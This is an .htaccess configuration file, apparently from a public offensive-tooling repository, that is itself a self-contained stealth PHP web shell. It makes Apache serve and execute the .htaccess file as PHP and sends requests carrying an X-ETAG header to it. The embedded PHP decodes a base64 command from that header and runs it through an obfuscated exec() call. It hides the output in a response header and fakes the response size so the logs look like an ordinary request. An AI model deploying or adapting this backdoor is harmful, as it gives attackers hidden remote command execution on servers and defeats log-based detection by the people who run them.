mubix/htshells/master/mod_php.stealth-shell.htaccess - Htaccess File


# Self contained .htaccess stealth web shell - Part of the htshell project
# Written by Wireghoul -
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
    Order allow,deny
    Allow from all

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted 
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

# Enable output buffering so we can fudge content length in logs (see the ob_* calls)
php_value output_buffering 1

# Rewrite supposed url to the .htaccess file if X-ETAG request header is set
RewriteEngine on
RewriteCond %{HTTP:X-ETAG} !^$
RewriteRule .* .htaccess [L]

# Set $e to exec(), discard 2 byte padding on base64 encoding (breaks automated decoding), payload in X-ETAG header
# Then make sure the log contains a 200 ok response with response size of 9326 (should match the file you are impersonating or a code in a 404 response)
# SHELL <?php ob_clean(); $b= "base64"."_decode"; $e = str_replace('y','e','yxyc'); $e($b(substr($_SERVER['HTTP_X_ETAG'],2))." 2>&1", $o); header("X-ETAG: AA".base64_encode(implode("rn ", $o))); print str_repeat("A", 9326); ob_flush(); exit(); ?>

On Github License


Download PDF of Htaccess file